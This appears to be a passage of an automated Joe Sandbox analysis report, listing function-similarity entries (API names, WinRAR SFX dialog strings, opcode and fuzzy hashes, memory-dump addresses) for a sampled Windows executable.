                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wcscpy
                                                                                                                                            • String ID: &nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                            • API String ID: 1284135714-864536935
                                                                                                                                            • Opcode ID: 5ff72e1646fdf217060b8e5c8401fb4e7bd885afca845a2c4c4fb9e22c13992d
                                                                                                                                            • Instruction ID: 493aaf9ddc506550ec65c4d7cbb08b67a85cb3f83d8ab8b6aaeffe21f1170028
                                                                                                                                            • Opcode Fuzzy Hash: 5ff72e1646fdf217060b8e5c8401fb4e7bd885afca845a2c4c4fb9e22c13992d
                                                                                                                                            • Instruction Fuzzy Hash: 8C31B953E0968283FF20AB11E4003795374EF50B84F548131DA8D8B295EF7EF581A3AB
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                            • String ID: csm$f
                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                            • Opcode ID: a9fd0d1b92df2077d9d556c6e535e3c3ecfdf6053e06fd4b056f1dc7555dcd55
                                                                                                                                            • Instruction ID: 722e791006949a13edc9c7c01bf8727d84e2e93bb6d9bf6738bb7c246599248f
                                                                                                                                            • Opcode Fuzzy Hash: a9fd0d1b92df2077d9d556c6e535e3c3ecfdf6053e06fd4b056f1dc7555dcd55
                                                                                                                                            • Instruction Fuzzy Hash: 8D51B233A1964687DB14EF15E444B2837A9FB44B98F608130DA5E87748EF3BE941EF09
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ItemText$Dialog
                                                                                                                                            • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                                                                            • API String ID: 1770891597-1315819833
                                                                                                                                            • Opcode ID: 5bf63ad80377ea271053d36964ce907f0b842b71eae3d6b85010761951103002
                                                                                                                                            • Instruction ID: 2f40f952362aa5612594788df7534836fec45b6c032c3af8683bf78afd261096
                                                                                                                                            • Opcode Fuzzy Hash: 5bf63ad80377ea271053d36964ce907f0b842b71eae3d6b85010761951103002
                                                                                                                                            • Instruction Fuzzy Hash: 9D51D663B18A8687FB609B11E8407BA6364FF84784F500131EA4D87B99DF7FE544DB0A
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ItemText$DialogWindow
                                                                                                                                            • String ID: RENAMEDLG
                                                                                                                                            • API String ID: 445417207-3299779563
                                                                                                                                            • Opcode ID: 9ef26468e0871f5a26e631ba78847545cde7723317f555f1c16012408c13c447
                                                                                                                                            • Instruction ID: 3aef7d0b01396ff0bbdb60e59f9a7977a0faad0684875e312f95a03f69da02ad
                                                                                                                                            • Opcode Fuzzy Hash: 9ef26468e0871f5a26e631ba78847545cde7723317f555f1c16012408c13c447
                                                                                                                                            • Instruction Fuzzy Hash: DB21C067A0CB4283FA409B12B94037923A5AB85FC0F248135CA0D87795CF3FE856970B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                            • API String ID: 0-56093855
                                                                                                                                            • Opcode ID: 5639ccaddfffa7073279490a03b60d1b86bc7360467457c09ecbd129ed9d9691
                                                                                                                                            • Instruction ID: 481db7be12c0cf6edc05575ea9b152db5734f51bb62c8ac08697b6b679f50629
                                                                                                                                            • Opcode Fuzzy Hash: 5639ccaddfffa7073279490a03b60d1b86bc7360467457c09ecbd129ed9d9691
                                                                                                                                            • Instruction Fuzzy Hash: 72216A6AA0CB4783FA109B10B84037923A4BF45788F54083AD94CC3664DF7FE5A5DB8B
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                            • Opcode ID: 4ca598a30639ae15ce9730c3618b6855dbcbfccf7a62b442dd9d6a7051895631
                                                                                                                                            • Instruction ID: ec3c1785ade27fb312695ddf40465eab67cc31a4eb993b086723797bdadb4751
                                                                                                                                            • Opcode Fuzzy Hash: 4ca598a30639ae15ce9730c3618b6855dbcbfccf7a62b442dd9d6a7051895631
                                                                                                                                            • Instruction Fuzzy Hash: 12F0AF63A28B42D3EF448F10F9903786368AFC8B90F581039D94F86264DE3DE588E705
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                            • Opcode ID: dedf2e0d36bbdd758fbb5a826079251fdaeca7d649d004319bad3569e4946327
                                                                                                                                            • Instruction ID: cf5e75cd7f6a076d9c44f2590db5b09b22efa3a9b2d6d667d11d1c60a00c2ce1
                                                                                                                                            • Opcode Fuzzy Hash: dedf2e0d36bbdd758fbb5a826079251fdaeca7d649d004319bad3569e4946327
                                                                                                                                            • Instruction Fuzzy Hash: FB81A123A1861287FB109B259C847FD27A8BF44B88F404135CD0E937D5EF3EA645E70A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3659116390-0
                                                                                                                                            • Opcode ID: 1688709713f9214a0397a124df39f7281203be7402982b9f016851b9e5d6f023
                                                                                                                                            • Instruction ID: b91681112f2df1e74c251cf217e0dd9ada8d1ffd8f5dcbb8fc83e04d2359248b
                                                                                                                                            • Opcode Fuzzy Hash: 1688709713f9214a0397a124df39f7281203be7402982b9f016851b9e5d6f023
                                                                                                                                            • Instruction Fuzzy Hash: 8051AF33B15A518BE710CF79E8443AC3BB8BB44788F148135DE5A87698DF39E245C709
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 262959230-0
                                                                                                                                            • Opcode ID: 21bbc52868f377291ace2f47a86dd0a7abbcd45137360e60d9030538f89b77ab
                                                                                                                                            • Instruction ID: eab360a1a8cf8f718b5360bacacf7372f1d529672365a8af4ffa6c6852fb0f0b
                                                                                                                                            • Opcode Fuzzy Hash: 21bbc52868f377291ace2f47a86dd0a7abbcd45137360e60d9030538f89b77ab
                                                                                                                                            • Instruction Fuzzy Hash: E541C223A087468BEB14AF6195003782798BF48BA4FA44634D96DCB7D5DF3FE141DB0A
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _set_statfp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                            • Opcode ID: c8b051e27b68c6b043da78d9bda75542202bddee0f68464aef4353d6aee2ea9e
                                                                                                                                            • Instruction ID: 39d260aced39df9e82f9e0d411208985271c8ffa0a282310f73affab1dcd5038
                                                                                                                                            • Opcode Fuzzy Hash: c8b051e27b68c6b043da78d9bda75542202bddee0f68464aef4353d6aee2ea9e
                                                                                                                                            • Instruction Fuzzy Hash: 62112727E1C60B13FA141129ED4537B23096F66370F080630E57EC61DAEE6EAE48610F
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastLoadStringswprintf
                                                                                                                                            • String ID: %ls$%s: %s
                                                                                                                                            • API String ID: 1667839203-2259941744
                                                                                                                                            • Opcode ID: 1ba35d18cc89e5dc5c262ed14f1e0cb727588d2e6d8749d039073a1984523ef0
                                                                                                                                            • Instruction ID: 59d589858e4eb2868d717b51c8165291df82702d8650b6b83b7d8d03b22b42aa
                                                                                                                                            • Opcode Fuzzy Hash: 1ba35d18cc89e5dc5c262ed14f1e0cb727588d2e6d8749d039073a1984523ef0
                                                                                                                                            • Instruction Fuzzy Hash: 43911B63E0C14283FE69656885683780399AF85B49F55413AD6CFCEADACD1FE901B30F
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: abort$EncodePointer
                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                            • API String ID: 1081739298-2084237596
                                                                                                                                            • Opcode ID: 58e6dfc58a54e411f18cfeca1383dfefe18c9c3eabe428a0aea1cc422f5a5531
                                                                                                                                            • Instruction ID: 116fd7edebfa9623be1fddf5365ee2baa2492e5ecc0c2397b3b94bf0c196b7f8
                                                                                                                                            • Opcode Fuzzy Hash: 58e6dfc58a54e411f18cfeca1383dfefe18c9c3eabe428a0aea1cc422f5a5531
                                                                                                                                            • Instruction Fuzzy Hash: F191BF73A08B818BE710EF65E8403AD7BA4F744788F244129EE8C87B59DF3AD195DB05
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __except_validate_context_recordabort
                                                                                                                                            • String ID: csm$csm
                                                                                                                                            • API String ID: 746414643-3733052814
                                                                                                                                            • Opcode ID: 7f091ce1c62c5f258933459583416fcafb90026797d5895e5b4787f9fa2e101c
                                                                                                                                            • Instruction ID: 991a193f2861bd00901635d9f4bd3a253c45cb23fec2262d19f59e7ff91b6f01
                                                                                                                                            • Opcode Fuzzy Hash: 7f091ce1c62c5f258933459583416fcafb90026797d5895e5b4787f9fa2e101c
                                                                                                                                            • Instruction Fuzzy Hash: 6C71A43390C68187DB616F25944077D7BA8EB40B88F258135DE8C97B8ACF3ED451DB46
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$StringType
                                                                                                                                            • String ID: $%s
                                                                                                                                            • API String ID: 3586891840-3791308623
                                                                                                                                            • Opcode ID: 66380f379492869372d9dc1cf9f6f59d0d6580fb9fc1f4b98a81335362ec22a1
                                                                                                                                            • Instruction ID: 7cd185323823b5568c7a9fbcd78a1612cebb51fb4ca3822c0b2fc02465a328f9
                                                                                                                                            • Opcode Fuzzy Hash: 66380f379492869372d9dc1cf9f6f59d0d6580fb9fc1f4b98a81335362ec22a1
                                                                                                                                            • Instruction Fuzzy Hash: 0F41A323B15B818BEB208F65DC043A923A9FB44BA8F580635DA1E877C4DF3DE945D309
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                                                                            • String ID: csm
                                                                                                                                            • API String ID: 2466640111-1018135373
                                                                                                                                            • Opcode ID: 0b3e91732bc49fbbec05a748ff5ac513a24bf80086f444e2e1ddf2f86afc4d4f
                                                                                                                                            • Instruction ID: 73977855128a972351a4152075b8f498d70a3081bdfd2e31a1bc8e0547f3b14c
                                                                                                                                            • Opcode Fuzzy Hash: 0b3e91732bc49fbbec05a748ff5ac513a24bf80086f444e2e1ddf2f86afc4d4f
                                                                                                                                            • Instruction Fuzzy Hash: AE514E3361878187E620BF16A04036E7BB8FB88B95F200134EB8D87B56DF3AD450DB46
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
